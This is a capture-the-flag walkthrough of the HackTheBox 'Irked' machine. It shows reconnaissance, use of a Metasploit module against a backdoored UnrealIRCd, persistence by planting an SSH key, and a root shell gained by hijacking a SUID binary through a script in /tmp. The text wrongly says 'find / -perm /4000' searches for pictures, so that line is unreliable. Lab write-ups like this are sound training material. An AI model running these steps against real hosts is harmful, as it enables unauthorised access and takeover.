HackTheBox - Irked

Morten Hansen • January 30, 2022

Irked

IP: 10.10.10.117

NMAP

22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35157/tcp6  status
|   100024  1          42921/udp   status
|   100024  1          44845/udp6  status
|_  100024  1          55063/tcp   status
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          45871/udp6  status
|   100024  1          46832/tcp   status
|   100024  1          47014/udp   status
|_  100024  1          58172/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
46832/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

BROWSER

gobuster dir -u 10.10.10.117 -w /usr/share/wordlists/dirb/big.txt -t 100 | tee gobuster
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/manual               (Status: 301) [Size: 313] [--> http://10.10.10.117/manual/]
/server-status        (Status: 403) [Size: 300]  

Apache HTTP Server Version 2.4

:irked.htb 256 morthius :Administrative info about irked.htb
:irked.htb 257 morthius :Bob Smith
:irked.htb 258 morthius :bob
:irked.htb 258 morthius :widely@used.name

ADMIN           LICENSE         PART            USERHOST
AWAY            LINKS           PING            USERIP
CREDITS         LIST            PONG            VERSION
CYCLE           LUSERS          PRIVMSG         VHOST
DALINFO         MAP             QUIT            WATCH
DCCALLOW        MODE            RULES           WHO
INVITE          MODULE          SETNAME         WHOIS
ISON            MOTD            SILENCE         WHOWAS
JOIN            NAMES           STATS
KICK            NICK            TIME
KNOCK           NOTICE          TOPIC

:irked.htb 292 morthius : -

┌──(kali㉿kali)-[~]
└─$ nmap --script irc-unrealircd-backdoor.nse 10.10.10.117 -p 8067 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 16:26 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.067s latency).

PORT     STATE SERVICE
8067/tcp open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Nmap done: 1 IP address (1 host up) scanned in 17.99 seconds

use exploit/unix/irc/unreal_ircd_3281_backdoor

uid=1001(ircd) gid=1001(ircd) groups=1001(ircd) Create .ssh folder inside ircd home-folder and set chmod 700, then import my key to authorized_keys and chmod 600. Then use ssh ircd@10.10.10.117.

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDjqFz8cYRIJmmhAGCEWGGvyUZdk3DRdw5uFkDHYXBCklDy/KDaNJSPpr/yc/DzdRsuDQIqE1jrrfqxZwztkSjIIg0THd/hrQ2WZh/sCE/H74CPHp0GUeB/HB6EOp8aHIHBecsK0Y1qiwiYGI5zgVeC01F3sqkHZSzHtyJRoqaHHipquwgQFYM6bprLpiiZnCk2ACw3V0bshs8J/032WUZ2cUWZNpBMlxwZXJ6OaZ4MF1abYISo4P35b5Pehza4Fx55LE+nEtc1m1kmnSqtVkPyB5f4Txv1D0nG2VH/sEpE6W4ern4ajH01p05JjUHw01mJObeGfVGoaPf5pCBSSNolENLbhzBBmnOaWAMfGJo88PP9YRuB6vc29Q95UFZEJX2+p26LAJFsphJ04w0YapAisBCtFp++ruRi0NvkBKSlI5WQoYdIIMLLRQp4WhKPkdUTEj3yjdflFalHnIEh0ryc8aVahBvVmBBGHLrEQKlyjHxDg2YDtGcZQEu6pm8a5XU= kali@kali" > /home/ircd/.ssh/authorized_keys

$ cd Documents 
$ ls
user.txt
$ cat user.txt
cat: user.txt: Permission denied
$ sudo -l
-sh: 18: sudo: not found
$ strings .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

This hints towards stegonagraphy which in 99% is a way of hiding information, and mostly in pictures. We do a search for pictures with find / -perm /4000 2>/dev/null and get a list that contains the irked.jpeg picture from http://10.10.10.117. We use steghide extract -sf irked.jpeg with password UPupDOWNdownLRlrBAbaSSss and get a file called pass.txt. This contains the string Kab6h+m+bbp2J:HG. We try this with su root and su djmargov and get access with djmargov.

We later runs linpeas.sh and focus on the SUID list. This shows an abnormal file calles /usr/bin/viewuser. If we try to run it we get the following text:

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-10-28 13:04 (:0)
ircd     pts/0        2021-10-28 13:14 (10.10.16.6)
sh: 1: /tmp/listusers: not found

This tells us it tries to run a sh-script from /tmp/listusers that is currently not created. We create a script called listusers at /tmp with nano.

#!/bin/bash

/bin/bash -p

We then run viewuser again and get a root shell!